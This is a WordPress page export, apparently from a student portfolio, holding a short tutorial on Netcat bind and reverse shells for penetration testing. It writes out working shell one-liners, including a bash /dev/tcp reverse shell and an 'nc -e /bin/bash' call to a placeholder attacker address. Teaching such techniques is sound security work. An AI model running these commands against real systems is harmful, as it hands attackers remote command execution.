Outlines shell types, connection handling, and post-exploitation access techniques. Shows strong understanding of remote access control.<\/p>\n\n\n\n
# Bind and Reverse Shell Listener Setup\n\nHow to set up both **bind shells** and **reverse shells** using Netcat. These techniques are common in penetration testing for establishing remote command execution after a foothold is obtained.\n\n---\n\n## 1. Bind Shell\n\nA bind shell is created on the **target system**. \nThe target opens a listening port and waits for the attacker to connect.\n\n### 1.1 Create a Bind Shell on the Target\n\n```bash\nnc -lvp 9001 -e \/bin\/bash\n````\n\n**Explanation:**\n\n* `-l` starts Netcat in listen mode\n* `-v` enables verbose output\n* `-p 9001` binds to port 9001\n* `-e \/bin\/bash` executes bash when a connection is made\n\nThis command turns the target machine into a listener that provides a shell when someone connects to the port.\n\n### 1.2 Connect to the Bind Shell from the Attacker\n\n```bash\nnc <target-ip> 9001\n```\n\nAfter connecting, you receive remote command execution on the target through the bash process.\n\n---\n\n## 2. Reverse Shell\n\nA reverse shell is created on the **attacker system**.\nThe attacker sets up a listener, and the target initiates the outbound connection.\n\nReverse shells are often more reliable because outbound connections are allowed in most environments.\n\n### 2.1 Set Up the Listener on the Attacker\n\n```bash\nnc -lvnp 9001\n```\n\n**Explanation:**\n\n* `-l` listen mode\n* `-v` verbose\n* `-n` avoid DNS lookups\n* `-p 9001` listen on port 9001\n\n### 2.2 Launch the Reverse Shell from the Target\n\nUsing bash:\n\n```bash\nbash -i >& \/dev\/tcp\/<attacker-ip>\/9001 0>&1\n```\n\nUsing Netcat (if supported):\n\n```bash\nnc <attacker-ip> 9001 -e \/bin\/bash\n```\n\nAfter running the reverse connection, the attacker receives interactive shell access.\n\n---\n\n## 3. Summary of Use Cases\n\n| Technique | Listener Location | Connection Direction | Typical Use |\n| ------------- | ----------------- | ------------------------ | --------------------------------- |\n| Bind Shell | Victim | Attacker connects inward | When inbound ports are accessible |\n| Reverse Shell | Attacker | Victim connects outward | Works through firewalls and NAT |\n\nReverse shells are the standard choice in most real engagements because outbound traffic is rarely blocked.\n\n---\n\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Outlines shell types, connection handling, and post-exploitation access techniques. Shows strong understanding of remote access control.<\/p>\n","protected":false},"author":30346,"featured_media":0,"parent":328,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/382"}],"collection":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/users\/30346"}],"replies":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/comments?post=382"}],"version-history":[{"count":1,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/382\/revisions"}],"predecessor-version":[{"id":383,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/382\/revisions\/383"}],"up":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/328"}],"wp:attachment":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/media?parent=382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}